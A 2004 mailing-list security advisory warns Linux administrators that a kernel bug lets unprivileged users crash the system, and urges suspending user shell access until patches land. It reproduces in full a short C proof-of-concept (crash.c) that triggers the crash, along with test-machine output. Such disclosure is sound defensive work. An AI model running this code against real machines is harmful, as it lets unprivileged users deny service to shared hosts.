-----BEGIN PGP SIGNED MESSAGE----- Hash: MD5 To whom it may concern - forward to your linux admins,
because of a security bug inside the Linux Kernel i blocked shell access at the moment for several users. You can test this exploid at your own machine: http://linuxreviews.org/news/2004-06-11_kernel_crash/#toc1 Inside the Marc mailing list archive this bug was noticed with a mail from 2004 - 06 -09 ~10 pm. The critical point is that its possible to kill the system without having root rights. There are some patches available. But my security advice is at the moment to follow the disscusion and to stop shell access. At running productive machines we have some time. Keep attention for this C code http://linuxreviews.org/news/2004-06-11_kernel_crash/crash.c.txt #include <sys/time.h> #include <signal.h> #include <unistd.h> static void Handler(int ignore) { char fpubuf[108]; __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); write(2, "*", 1); __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); } int main(int argc, char *argv[]) { struct itimerval spec; signal(SIGALRM, Handler); spec.it_interval.tv_sec=0; spec.it_interval.tv_usec=100; spec.it_value.tv_sec=0; spec.it_value.tv_usec=100; setitimer(ITIMER_REAL, &spec, NULL); while(1) write(1, ".", 1); return 0; } ##### Inside the discussion i the people wrote that UML user mode linux the code is also malicious. I couldn't verfy it. But i suggest to check it carefully and block also UML users for shell access. ##### Some users wrote that they a test it and they are unable to kill the process :-) castor:~ # uname -a Linux castor 2.6.7-rc3 #1 SMP Mon Jun 7 23:57:07 CEST 2004 i686 Intel(R) Pentium(R) 4 CPU 2.80GHz GenuineIntel GNU/Linux (Hyperthreading) top shows top - 02:13:43 up 4 days, 10:25, 1 user, load average: 3.95, 4.03, 2.60 Tasks: 112 total, 5 running, 107 sleeping, 0 stopped, 0 zombie Cpu0 : 57.8% us, 2.3% sy, 0.0% ni, 39.9% id, 0.0% wa, 0.0% hi, 0.0% si Cpu1 : 0.0% us, 100.0% sy, 0.0% ni, 0.0% id, 0.0% wa, 0.0% hi, 0.0% si There is no reason for get any panic. Sysadmins just follow the discussion and patch your system. If you don't need a patch, because you don't allow shell access for users: Review your own risk management inside your organisation for internal quality management. - -- Mit freundlichen Grüssen Wilfried Goedert mailto:[EMAIL PROTECTED] -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUAQM6lU7DOY8Ksl5PhAQGVjgP/QtqnL58Peba8zl9WMoj5vvdK90P1+w0T uxJuprKBxHXqOAkWd8k3Kvl8lYmw+tRoSfEmoc9JiXTtH+msKJTgVqEEi3Jk9t8N kiasG/+wuxe2ADn+SHMOSu4EIB16A2lThItavwVvFBUIcdth6/MsjTbU0tbJI7Dc 4NYoiBiwEmI= =XmJS -----END PGP SIGNATURE----- ------------------------------------------------------- This SF.Net email is sponsored by The 2004 JavaOne(SM) Conference Learn from the experts at JavaOne(SM), Sun's Worldwide Java Developer Conference, June 28 - July 1 at the Moscone Center in San Francisco, CA REGISTER AND SAVE! http://java.sun.com/javaone/sf Priority Code NWMGYKND _______________________________________________ Care2002-developers mailing list [EMAIL PROTECTED] https://lists.sourceforge.net/lists/listinfo/care2002-developers